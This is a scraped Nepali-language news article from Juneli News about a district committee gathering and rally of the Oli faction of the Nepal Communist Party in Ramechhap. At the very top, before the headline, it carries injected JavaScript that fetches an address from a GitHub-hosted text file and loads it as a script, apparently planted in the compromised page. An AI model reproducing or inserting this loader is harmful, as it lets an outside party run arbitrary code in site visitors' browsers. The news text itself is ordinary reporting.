;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); हजारौंको सहभागितामा सुरु भयो ओली समुहको दोस्रो जिल्ला कमिटी भेला (भिडियो) – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • हजारौंको सहभागितामा सुरु भयो ओली समुहको दोस्रो जिल्ला कमिटी भेला (भिडियो)
देश/प्रदेश

हजारौंको सहभागितामा सुरु भयो ओली समुहको दोस्रो जिल्ला कमिटी भेला (भिडियो)

माघ १५,

रामेछाप । नेपाल कम्युनिष्ट पार्टी (नेकपा) ओली समुहको रामेछापको दोस्रो जिल्ला कमिटी भेला बृहत शक्ति प्रर्दशन सहित सुरु भएको छ । भेलामा करिब हजार जनाबढीको उपस्थिति रहेको छ । यो भेलामा करिब १ हजार भन्दाबढीको उपस्थिति हुने आनेरास्वियूका जिल्ला कमिटीका सचिवालय सदस्य पुष्कर भट्टराईले जुनेली न्युजलाई जानकारी दिए ।

केन्द्रीय सदस्य तथा ओली समुहका नेता महेश बस्नेत भेलालाई सम्बोधन गर्न जिल्ला सदरमुकाम समेत रहेको मन्थली आइपुगेका हुन् ।

राष्ट्रिय युवा संघ नेपाल र अनेरास्वियू जिल्ला कमिटी संघले आयोजना गरेको बृहत युवा विद्यार्थी भेला मन्थलीको थापा चोकबाट मोटरसाईकल र्यालीसहित मदनआश्रित चोकबाट बृहत र्यालीसहित समन्वय समितिमा पुगेर कोणसभामा परिणत भएको हो ।

भेलालाई जिल्लाका नेताहरुसहित बागमती प्रदेशका आर्थिक मामिला तथा योजना मन्त्री तथा केन्द्रीय सदस्य कैलाश ढुङ्गेललगाएतले सम्बोधन गर्ने छन् ।

भिडियो मिलन घिमिरे/जुनेली न्युज डट् कम

 

 

फेसबुक प्रतिक्रियाहरु